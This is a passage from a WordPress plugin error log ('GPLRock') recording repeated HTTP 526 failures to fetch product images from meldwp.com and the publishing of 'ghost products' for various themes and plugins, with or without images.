HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:52 UTC] GPLRock: Image download failed for product agreek-agriculture-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agreek---agriculture--organic-food-wordpress-theme-28976.webp for product agreek-agriculture-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:09:54 UTC] GPLRock WARNING: Image download failed for product agreek-agriculture-organic-food-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agreek---agriculture--organic-food-wordpress-theme-28976.webp [06-Apr-2026 18:09:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agreek-agriculture-organic-food-wordpress-theme [06-Apr-2026 18:09:54 UTC] GPLRock: Image download failed for product repair-plus-electronics-and-phone-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:56 UTC] GPLRock: Image download failed for product repair-plus-electronics-and-phone-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:09:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/repair-plus---electronics-and-phone-wordpress-theme-15443.webp for product repair-plus-electronics-and-phone-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:09:58 UTC] GPLRock: Image download failed for product repair-plus-electronics-and-phone-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:00 UTC] GPLRock: Image download failed for product repair-plus-electronics-and-phone-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/repair-plus---electronics-and-phone-wordpress-theme-15443.webp for product repair-plus-electronics-and-phone-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:02 UTC] GPLRock WARNING: Image download failed for product repair-plus-electronics-and-phone-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/repair-plus---electronics-and-phone-wordpress-theme-15443.webp [06-Apr-2026 18:10:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: repair-plus-electronics-and-phone-wordpress-theme [06-Apr-2026 18:10:03 UTC] GPLRock: Image download failed for product newsfox-newspaper-and-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:05 UTC] GPLRock: Image download failed for product newsfox-newspaper-and-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsfox--newspaper-and-magazine-wordpress-theme-21451.webp for product newsfox-newspaper-and-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:07 UTC] GPLRock: Image download failed for product newsfox-newspaper-and-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:09 UTC] GPLRock: Image download failed for product newsfox-newspaper-and-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/newsfox--newspaper-and-magazine-wordpress-theme-21451.webp for product newsfox-newspaper-and-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:11 UTC] GPLRock WARNING: Image download failed for product newsfox-newspaper-and-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/newsfox--newspaper-and-magazine-wordpress-theme-21451.webp [06-Apr-2026 18:10:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: newsfox-newspaper-and-magazine-wordpress-theme [06-Apr-2026 18:10:11 UTC] GPLRock: Image download failed for product children-charity-nonprofit-ngo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:14 UTC] GPLRock: Image download failed for product children-charity-nonprofit-ngo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/children-charity---nonprofit--ngo-wordpress-theme-10733.webp for product children-charity-nonprofit-ngo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:16 UTC] GPLRock: Image download failed for product children-charity-nonprofit-ngo-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:18 UTC] GPLRock: Image download failed for product children-charity-nonprofit-ngo-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/children-charity---nonprofit--ngo-wordpress-theme-10733.webp for product children-charity-nonprofit-ngo-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:20 UTC] GPLRock WARNING: Image download failed for product children-charity-nonprofit-ngo-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/children-charity---nonprofit--ngo-wordpress-theme-10733.webp [06-Apr-2026 18:10:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: children-charity-nonprofit-ngo-wordpress-theme [06-Apr-2026 18:10:20 UTC] GPLRock: Image download failed for product sinco-data-science-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:22 UTC] GPLRock: Image download failed for product sinco-data-science-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sinco---data-science-wordpress-theme-9050.webp for product sinco-data-science-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:24 UTC] GPLRock: Image download failed for product sinco-data-science-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:27 UTC] GPLRock: Image download failed for product sinco-data-science-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/sinco---data-science-wordpress-theme-9050.webp for product sinco-data-science-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:29 UTC] GPLRock WARNING: Image download failed for product sinco-data-science-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/sinco---data-science-wordpress-theme-9050.webp [06-Apr-2026 18:10:29 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: sinco-data-science-wordpress-theme [06-Apr-2026 18:10:29 UTC] GPLRock: Image download failed for product peeboo-pet-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:31 UTC] GPLRock: Image download failed for product peeboo-pet-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peeboo--pet-store-woocommerce-wordpress-theme-460.webp for product peeboo-pet-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:33 UTC] GPLRock: Image download failed for product peeboo-pet-store-woocommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:35 UTC] GPLRock: Image download failed for product peeboo-pet-store-woocommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/peeboo--pet-store-woocommerce-wordpress-theme-460.webp for product peeboo-pet-store-woocommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:37 UTC] GPLRock WARNING: Image download failed for product peeboo-pet-store-woocommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/peeboo--pet-store-woocommerce-wordpress-theme-460.webp [06-Apr-2026 18:10:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: peeboo-pet-store-woocommerce-wordpress-theme [06-Apr-2026 18:10:37 UTC] GPLRock: Image download failed for product agenzio-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:40 UTC] GPLRock: Image download failed for product agenzio-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agenzio---creative-agency--portfolio-wordpress-theme-25644.webp for product agenzio-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:42 UTC] GPLRock: Image download failed for product agenzio-creative-agency-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:44 UTC] GPLRock: Image download failed for product agenzio-creative-agency-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/agenzio---creative-agency--portfolio-wordpress-theme-25644.webp for product agenzio-creative-agency-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:46 UTC] GPLRock WARNING: Image download failed for product agenzio-creative-agency-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/agenzio---creative-agency--portfolio-wordpress-theme-25644.webp [06-Apr-2026 18:10:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: agenzio-creative-agency-portfolio-wordpress-theme [06-Apr-2026 18:10:46 UTC] GPLRock: Image download failed for product halogen-innovative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:48 UTC] GPLRock: Image download failed for product halogen-innovative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halogen---innovative-portfolio-wordpress-theme-14212.webp for product halogen-innovative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:50 UTC] GPLRock: Image download failed for product halogen-innovative-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:53 UTC] GPLRock: Image download failed for product halogen-innovative-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/halogen---innovative-portfolio-wordpress-theme-14212.webp for product halogen-innovative-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:55 UTC] GPLRock WARNING: Image download failed for product halogen-innovative-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/halogen---innovative-portfolio-wordpress-theme-14212.webp [06-Apr-2026 18:10:55 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: halogen-innovative-portfolio-wordpress-theme [06-Apr-2026 18:10:55 UTC] GPLRock: Image download failed for product gavello-captivating-minimalist-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:57 UTC] GPLRock: Image download failed for product gavello-captivating-minimalist-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:10:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gavello---captivating-minimalist-blog-wordpress-theme-24545.webp for product gavello-captivating-minimalist-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:10:59 UTC] GPLRock: Image download failed for product gavello-captivating-minimalist-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:01 UTC] GPLRock: Image download failed for product gavello-captivating-minimalist-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/gavello---captivating-minimalist-blog-wordpress-theme-24545.webp for product gavello-captivating-minimalist-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:03 UTC] GPLRock WARNING: Image download failed for product gavello-captivating-minimalist-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/gavello---captivating-minimalist-blog-wordpress-theme-24545.webp [06-Apr-2026 18:11:03 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: gavello-captivating-minimalist-blog-wordpress-theme [06-Apr-2026 18:11:25 UTC] GPLRock: Image download failed for product cloudarcade-html5-web-game-portal-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:27 UTC] GPLRock: Image download failed for product cloudarcade-html5-web-game-portal-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cloudarcade---html5--web-game-portal-cms-11137.webp for product cloudarcade-html5-web-game-portal-cms after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:29 UTC] GPLRock: Image download failed for product cloudarcade-html5-web-game-portal-cms (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:31 UTC] GPLRock: Image download failed for product cloudarcade-html5-web-game-portal-cms (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cloudarcade---html5--web-game-portal-cms-11137.webp for product cloudarcade-html5-web-game-portal-cms after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:33 UTC] GPLRock WARNING: Image download failed for product cloudarcade-html5-web-game-portal-cms. URL: https://meldwp.com/wp-content/uploads/cloudarcade---html5--web-game-portal-cms-11137.webp [06-Apr-2026 18:11:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cloudarcade-html5-web-game-portal-cms [06-Apr-2026 18:11:33 UTC] GPLRock: Image download failed for product selling-commander-connector-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:35 UTC] GPLRock: Image download failed for product selling-commander-connector-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/selling-commander-connector-plugin-for-woocommerce-28396.webp for product selling-commander-connector-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:38 UTC] GPLRock: Image download failed for product selling-commander-connector-plugin-for-woocommerce (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:40 UTC] GPLRock: Image download failed for product selling-commander-connector-plugin-for-woocommerce (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/selling-commander-connector-plugin-for-woocommerce-28396.webp for product selling-commander-connector-plugin-for-woocommerce after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:42 UTC] GPLRock WARNING: Image download failed for product selling-commander-connector-plugin-for-woocommerce. URL: https://meldwp.com/wp-content/uploads/selling-commander-connector-plugin-for-woocommerce-28396.webp [06-Apr-2026 18:11:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: selling-commander-connector-plugin-for-woocommerce [06-Apr-2026 18:11:42 UTC] GPLRock: Image downloaded successfully for product cornerstone-addon-progress-bars-ultimate-dzs (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cc2c0eaf.webp [06-Apr-2026 18:11:42 UTC] GPLRock: Using pre-downloaded image for product cornerstone-addon-progress-bars-ultimate-dzs: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cc2c0eaf.webp [06-Apr-2026 18:11:42 UTC] GPLRock: Ghost product published with image - Product ID: cornerstone-addon-progress-bars-ultimate-dzs [06-Apr-2026 18:11:42 UTC] GPLRock: Image downloaded successfully for product woocommerce-minimummaximum-quantities (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-04d6a248.webp [06-Apr-2026 18:11:42 UTC] GPLRock: Using pre-downloaded image for product woocommerce-minimummaximum-quantities: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-04d6a248.webp [06-Apr-2026 18:11:42 UTC] GPLRock: Ghost product published with image - Product ID: woocommerce-minimummaximum-quantities [06-Apr-2026 18:11:42 UTC] GPLRock: Image download failed for product advance-ajax-search-for-woocommerce-postproductpage (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:44 UTC] GPLRock: Image download failed for product advance-ajax-search-for-woocommerce-postproductpage (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advance-ajax-search-for-woocommerce-postproductpage-33041.webp for product advance-ajax-search-for-woocommerce-postproductpage after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:47 UTC] GPLRock: Image download failed for product advance-ajax-search-for-woocommerce-postproductpage (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:49 UTC] GPLRock: Image download failed for product advance-ajax-search-for-woocommerce-postproductpage (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:51 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/advance-ajax-search-for-woocommerce-postproductpage-33041.webp for product advance-ajax-search-for-woocommerce-postproductpage after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:51 UTC] GPLRock WARNING: Image download failed for product advance-ajax-search-for-woocommerce-postproductpage. URL: https://meldwp.com/wp-content/uploads/advance-ajax-search-for-woocommerce-postproductpage-33041.webp [06-Apr-2026 18:11:51 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: advance-ajax-search-for-woocommerce-postproductpage [06-Apr-2026 18:11:51 UTC] GPLRock: Image download failed for product smartadv-tooltips-banners-and-popups-for-wp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:53 UTC] GPLRock: Image download failed for product smartadv-tooltips-banners-and-popups-for-wp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartadv---tooltips-banners-and-popups-for-wp-28491.webp for product smartadv-tooltips-banners-and-popups-for-wp after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:55 UTC] GPLRock: Image download failed for product smartadv-tooltips-banners-and-popups-for-wp (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:57 UTC] GPLRock: Image download failed for product smartadv-tooltips-banners-and-popups-for-wp (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:11:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartadv---tooltips-banners-and-popups-for-wp-28491.webp for product smartadv-tooltips-banners-and-popups-for-wp after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:11:59 UTC] GPLRock WARNING: Image download failed for product smartadv-tooltips-banners-and-popups-for-wp. URL: https://meldwp.com/wp-content/uploads/smartadv---tooltips-banners-and-popups-for-wp-28491.webp [06-Apr-2026 18:11:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smartadv-tooltips-banners-and-popups-for-wp [06-Apr-2026 18:12:00 UTC] GPLRock: Image download failed for product save-products-for-later-save-share-woocommerce-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:02 UTC] GPLRock: Image download failed for product save-products-for-later-save-share-woocommerce-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:04 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/save-products-for-later-save--share-woocommerce-cart-29716.webp for product save-products-for-later-save-share-woocommerce-cart after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:04 UTC] GPLRock: Image download failed for product save-products-for-later-save-share-woocommerce-cart (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:06 UTC] GPLRock: Image download failed for product save-products-for-later-save-share-woocommerce-cart (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/save-products-for-later-save--share-woocommerce-cart-29716.webp for product save-products-for-later-save-share-woocommerce-cart after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:08 UTC] GPLRock WARNING: Image download failed for product save-products-for-later-save-share-woocommerce-cart. URL: https://meldwp.com/wp-content/uploads/save-products-for-later-save--share-woocommerce-cart-29716.webp [06-Apr-2026 18:12:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: save-products-for-later-save-share-woocommerce-cart [06-Apr-2026 18:12:08 UTC] GPLRock: Image download failed for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:10 UTC] GPLRock: Image download failed for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xsender---bulk-email-sms-and-whatsapp-messaging-application-saas-22093.webp for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:13 UTC] GPLRock: Image download failed for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:15 UTC] GPLRock: Image download failed for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:17 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xsender---bulk-email-sms-and-whatsapp-messaging-application-saas-22093.webp for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:17 UTC] GPLRock WARNING: Image download failed for product xsender-bulk-email-sms-and-whatsapp-messaging-application-saas. URL: https://meldwp.com/wp-content/uploads/xsender---bulk-email-sms-and-whatsapp-messaging-application-saas-22093.webp [06-Apr-2026 18:12:17 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xsender-bulk-email-sms-and-whatsapp-messaging-application-saas [06-Apr-2026 18:12:17 UTC] GPLRock: Image download failed for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:19 UTC] GPLRock: Image download failed for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xpanel---smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes-6110.webp for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:21 UTC] GPLRock: Image download failed for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:23 UTC] GPLRock: Image download failed for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/xpanel---smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes-6110.webp for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:25 UTC] GPLRock WARNING: Image download failed for product xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes. URL: https://meldwp.com/wp-content/uploads/xpanel---smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes-6110.webp [06-Apr-2026 18:12:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: xpanel-smart-sliding-panel-and-sidebar-widget-area-for-wordpress-themes [06-Apr-2026 18:12:26 UTC] GPLRock: Image download failed for product cost-calculator-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:28 UTC] GPLRock: Image download failed for product cost-calculator-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:30 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cost-calculator-for-wordpress-10417.webp for product cost-calculator-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:30 UTC] GPLRock: Image download failed for product cost-calculator-for-wordpress (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:32 UTC] GPLRock: Image download failed for product cost-calculator-for-wordpress (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:34 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/cost-calculator-for-wordpress-10417.webp for product cost-calculator-for-wordpress after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:34 UTC] GPLRock WARNING: Image download failed for product cost-calculator-for-wordpress. URL: https://meldwp.com/wp-content/uploads/cost-calculator-for-wordpress-10417.webp [06-Apr-2026 18:12:34 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: cost-calculator-for-wordpress [06-Apr-2026 18:12:54 UTC] GPLRock: Image download failed for product nobility-charity-nonprofit-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:56 UTC] GPLRock: Image download failed for product nobility-charity-nonprofit-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:12:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nobility---charity-nonprofit-multipurpose-wordpress-theme-8026.webp for product nobility-charity-nonprofit-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:12:58 UTC] GPLRock: Image download failed for product nobility-charity-nonprofit-multipurpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:00 UTC] GPLRock: Image download failed for product nobility-charity-nonprofit-multipurpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nobility---charity-nonprofit-multipurpose-wordpress-theme-8026.webp for product nobility-charity-nonprofit-multipurpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:02 UTC] GPLRock WARNING: Image download failed for product nobility-charity-nonprofit-multipurpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nobility---charity-nonprofit-multipurpose-wordpress-theme-8026.webp [06-Apr-2026 18:13:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nobility-charity-nonprofit-multipurpose-wordpress-theme [06-Apr-2026 18:13:03 UTC] GPLRock: Image downloaded successfully for product icarus-photography-theme-for-wordpress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac4b68ca.webp [06-Apr-2026 18:13:03 UTC] GPLRock: Using pre-downloaded image for product icarus-photography-theme-for-wordpress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ac4b68ca.webp [06-Apr-2026 18:13:03 UTC] GPLRock: Ghost product published with image - Product ID: icarus-photography-theme-for-wordpress [06-Apr-2026 18:13:03 UTC] GPLRock: Image download failed for product micare-medical-and-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:05 UTC] GPLRock: Image download failed for product micare-medical-and-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micare---medical-and-health-care-wordpress-theme-4320.webp for product micare-medical-and-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:07 UTC] GPLRock: Image download failed for product micare-medical-and-health-care-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:09 UTC] GPLRock: Image download failed for product micare-medical-and-health-care-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 18:13:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/micare---medical-and-health-care-wordpress-theme-4320.webp for product micare-medical-and-health-care-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 18:13:11 UTC] GPLRock WARNING: Image download failed for product micare-medical-and-health-care-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/micare---medical-and-health-care-wordpress-theme-4320.webp [06-Apr-2026 18:13:11 UTC] GPLRock WARNING: Ghost product published 